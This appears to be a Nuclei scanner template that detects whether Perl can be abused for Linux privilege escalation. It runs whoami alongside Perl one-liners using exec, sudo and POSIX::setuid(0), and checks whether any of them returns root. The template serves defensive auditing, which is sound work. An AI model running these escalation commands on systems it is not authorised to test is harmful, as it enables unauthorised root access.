id: privesc-perl

info:
  name: Perl - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.
  reference:
    - https://gtfobins.github.io/gtfobins/perl/
  metadata:
    verified: true
    max-request: 4
  tags: code,linux,perl,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      perl -e 'exec "whoami";'

  - engine:
      - sh
      - bash
    source: |
      sudo perl -e 'exec "whoami";'

  - engine:
      - sh
      - bash
    source: |
      perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
          - 'contains(code_4_response, "root")'
        condition: or
# digest: 4b0a00483046022100d367ef3d3b23c4bc3cfc57f4c4355c71f5a248883b2af0a8fdcbbeca1cd4996a022100cd5a6190d9acd7dd41f18f3dd5b568c89804ff6fa0c16443f3d2a6b3f3d069fb:922c64590222798bb761d5b6d8e72950